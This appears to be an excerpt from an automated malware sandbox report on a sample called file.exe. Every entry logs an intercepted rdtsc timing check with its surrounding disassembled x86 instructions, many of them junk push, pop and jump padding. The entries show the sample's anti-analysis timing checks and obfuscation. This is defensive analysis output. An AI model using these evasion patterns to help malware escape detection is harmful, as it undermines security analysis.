                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E107B3 second address: 4E107D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F865CD192E4h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movzx ecx, di 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E107D8 second address: 4E107FE instructions: 0x00000000 rdtsc 0x00000002 mov eax, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov cl, 8Dh 0x0000000d push ebx 0x0000000e pop edx 0x0000000f popad 0x00000010 and dword ptr [eax], 00000000h 0x00000013 pushad 0x00000014 mov di, EEDEh 0x00000018 popad 0x00000019 and dword ptr [eax+04h], 00000000h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 movzx ecx, bx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E107FE second address: 4E10817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192E5h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF05EE second address: 4DF05F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF05F3 second address: 4DF05F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF05F9 second address: 4DF0612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F865D1C554Fh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0612 second address: 4DF066F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e push esi 0x0000000f pop ebx 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov esi, ebx 0x00000018 pushfd 0x00000019 jmp 00007F865CD192DFh 0x0000001e xor esi, 65EA2D4Eh 0x00000024 jmp 00007F865CD192E9h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10253 second address: 4E10257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10257 second address: 4E1025D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1025D second address: 4E10264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10264 second address: 4E10298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F865CD192DEh 0x00000010 add si, D888h 0x00000015 jmp 00007F865CD192DBh 0x0000001a popfd 0x0000001b mov ch, 08h 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10298 second address: 4E1029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1029C second address: 4E102A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10564 second address: 4E10568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10568 second address: 4E1056E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1056E second address: 4E105B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F865D1C5551h 0x00000011 add si, A866h 0x00000016 jmp 00007F865D1C5551h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e mov esi, 40E7026Dh 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E105B2 second address: 4E105B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E105B6 second address: 4E105FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop esi 0x0000000d pushfd 0x0000000e jmp 00007F865D1C5557h 0x00000013 adc ecx, 7545604Eh 0x00000019 jmp 00007F865D1C5559h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30734 second address: 4E3075C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, F9A9h 0x00000011 push eax 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3075C second address: 4E3076E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Eh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3076E second address: 4E307D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F865CD192E7h 0x0000000e mov eax, dword ptr [778165FCh] 0x00000013 pushad 0x00000014 push eax 0x00000015 mov eax, ebx 0x00000017 pop ebx 0x00000018 call 00007F865CD192DCh 0x0000001d mov dh, ch 0x0000001f pop edi 0x00000020 popad 0x00000021 test eax, eax 0x00000023 pushad 0x00000024 mov di, cx 0x00000027 movzx esi, bx 0x0000002a popad 0x0000002b je 00007F86CF67C48Ah 0x00000031 jmp 00007F865CD192E7h 0x00000036 mov ecx, eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E307D7 second address: 4E307DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E307DB second address: 4E307E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E307E1 second address: 4E307E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E307E8 second address: 4E30814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor eax, dword ptr [ebp+08h] 0x0000000a jmp 00007F865CD192E1h 0x0000000f and ecx, 1Fh 0x00000012 pushad 0x00000013 mov edi, eax 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 ror eax, cl 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30814 second address: 4E3082B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3082B second address: 4E30858 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F865CD192DFh 0x00000008 movzx eax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e leave 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F865CD192DCh 0x00000017 pop ecx 0x00000018 movsx edi, ax 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30858 second address: 4E3085E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30941 second address: 4E30945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30945 second address: 4E3094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0055 second address: 4DE005A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE005A second address: 4DE00D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 4DB57593h 0x00000008 mov ah, D7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F865D1C554Bh 0x00000013 mov ebp, esp 0x00000015 jmp 00007F865D1C5556h 0x0000001a and esp, FFFFFFF8h 0x0000001d pushad 0x0000001e movzx eax, di 0x00000021 mov eax, edx 0x00000023 popad 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F865D1C5550h 0x0000002c adc esi, 11AA17A8h 0x00000032 jmp 00007F865D1C554Bh 0x00000037 popfd 0x00000038 movzx esi, di 0x0000003b popad 0x0000003c mov dword ptr [esp], ecx 0x0000003f jmp 00007F865D1C554Bh 0x00000044 xchg eax, ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE00D2 second address: 4DE00E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F865CD192E1h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE00E9 second address: 4DE015A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edx, 1B2B2714h 0x00000010 jmp 00007F865D1C554Dh 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 pushad 0x00000019 movzx eax, bx 0x0000001c mov ebx, 1BFC78BAh 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007F865D1C554Bh 0x00000028 xor ax, C05Eh 0x0000002d jmp 00007F865D1C5559h 0x00000032 popfd 0x00000033 popad 0x00000034 mov ebx, dword ptr [ebp+10h] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F865D1C554Dh 0x0000003e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE015A second address: 4DE019E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 3E22h 0x00000007 call 00007F865CD192E3h 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 jmp 00007F865CD192E4h 0x00000016 mov dword ptr [esp], esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F865CD192DAh 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE019E second address: 4DE01AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE01AD second address: 4DE01B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE01B3 second address: 4DE01B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE01B7 second address: 4DE01EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007F865CD192E7h 0x00000010 xchg eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F865CD192E0h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE01EE second address: 4DE01F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE01F4 second address: 4DE01FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE01FA second address: 4DE0243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5558h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F865D1C554Bh 0x00000011 xchg eax, edi 0x00000012 jmp 00007F865D1C5556h 0x00000017 test esi, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0243 second address: 4DE0247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0247 second address: 4DE024B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE024B second address: 4DE0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0251 second address: 4DE0260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Bh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0260 second address: 4DE0264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0264 second address: 4DE02AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F86CFB738EFh 0x0000000e jmp 00007F865D1C5555h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a jmp 00007F865D1C554Eh 0x0000001f je 00007F86CFB738D5h 0x00000025 pushad 0x00000026 mov cx, 66EDh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE02AB second address: 4DE032E instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c mov ecx, ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop eax 0x00000013 popad 0x00000014 popad 0x00000015 or edx, dword ptr [ebp+0Ch] 0x00000018 jmp 00007F865CD192E1h 0x0000001d test edx, 61000000h 0x00000023 pushad 0x00000024 push ecx 0x00000025 jmp 00007F865CD192E3h 0x0000002a pop ecx 0x0000002b mov dh, E5h 0x0000002d popad 0x0000002e jne 00007F86CF6C766Bh 0x00000034 jmp 00007F865CD192E0h 0x00000039 test byte ptr [esi+48h], 00000001h 0x0000003d jmp 00007F865CD192E0h 0x00000042 jne 00007F86CF6C765Ah 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov edx, 751699C0h 0x00000050 mov dh, 91h 0x00000052 popad 0x00000053 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0734 second address: 4DD0738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0738 second address: 4DD073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD073E second address: 4DD0757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bl, DFh 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0757 second address: 4DD076C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192E1h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD076C second address: 4DD0804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F865D1C554Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F865D1C5550h 0x00000014 mov ebp, esp 0x00000016 jmp 00007F865D1C5550h 0x0000001b and esp, FFFFFFF8h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F865D1C554Eh 0x00000025 or cx, F6E8h 0x0000002a jmp 00007F865D1C554Bh 0x0000002f popfd 0x00000030 call 00007F865D1C5558h 0x00000035 jmp 00007F865D1C5552h 0x0000003a pop ecx 0x0000003b popad 0x0000003c push esp 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F865D1C554Dh 0x00000044 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0804 second address: 4DD0814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192DCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0814 second address: 4DD082E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD082E second address: 4DD0832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0832 second address: 4DD084D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD084D second address: 4DD08A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, bx 0x00000010 pushfd 0x00000011 jmp 00007F865CD192DFh 0x00000016 adc si, 145Eh 0x0000001b jmp 00007F865CD192E9h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD08A1 second address: 4DD08C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F865D1C554Ch 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD08C5 second address: 4DD093F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov edx, eax 0x0000000d push eax 0x0000000e mov di, 8982h 0x00000012 pop edx 0x00000013 popad 0x00000014 mov esi, dword ptr [ebp+08h] 0x00000017 pushad 0x00000018 mov dx, ax 0x0000001b push esi 0x0000001c mov ebx, 5E305732h 0x00000021 pop edx 0x00000022 popad 0x00000023 sub ebx, ebx 0x00000025 pushad 0x00000026 movsx edi, si 0x00000029 jmp 00007F865CD192DEh 0x0000002e popad 0x0000002f test esi, esi 0x00000031 pushad 0x00000032 push esi 0x00000033 push edx 0x00000034 pop ecx 0x00000035 pop edx 0x00000036 call 00007F865CD192E6h 0x0000003b mov ax, EDC1h 0x0000003f pop ecx 0x00000040 popad 0x00000041 je 00007F86CF6CED3Eh 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F865CD192DFh 0x00000050 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD093F second address: 4DD095C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD095C second address: 4DD09EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov cx, 1C03h 0x00000015 jmp 00007F865CD192E8h 0x0000001a popad 0x0000001b mov ecx, esi 0x0000001d pushad 0x0000001e mov ecx, 3C85B79Dh 0x00000023 popad 0x00000024 je 00007F86CF6CECDAh 0x0000002a jmp 00007F865CD192E4h 0x0000002f test byte ptr [77816968h], 00000002h 0x00000036 jmp 00007F865CD192E0h 0x0000003b jne 00007F86CF6CECBCh 0x00000041 jmp 00007F865CD192E0h 0x00000046 mov edx, dword ptr [ebp+0Ch] 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD09EF second address: 4DD0A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0A0C second address: 4DD0A37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F865CD192DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0A37 second address: 4DD0A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0A3B second address: 4DD0A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0A3F second address: 4DD0A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0A45 second address: 4DD0A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F865CD192E5h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0A70 second address: 4DD0A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0A76 second address: 4DD0A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0A7A second address: 4DD0A89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0A89 second address: 4DD0A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0A9A second address: 4DD0AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c pushad 0x0000000d mov di, si 0x00000010 jmp 00007F865D1C5558h 0x00000015 popad 0x00000016 push dword ptr [ebp+14h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F865D1C554Dh 0x00000022 jmp 00007F865D1C554Bh 0x00000027 popfd 0x00000028 mov edi, eax 0x0000002a popad 0x0000002b rdtsc
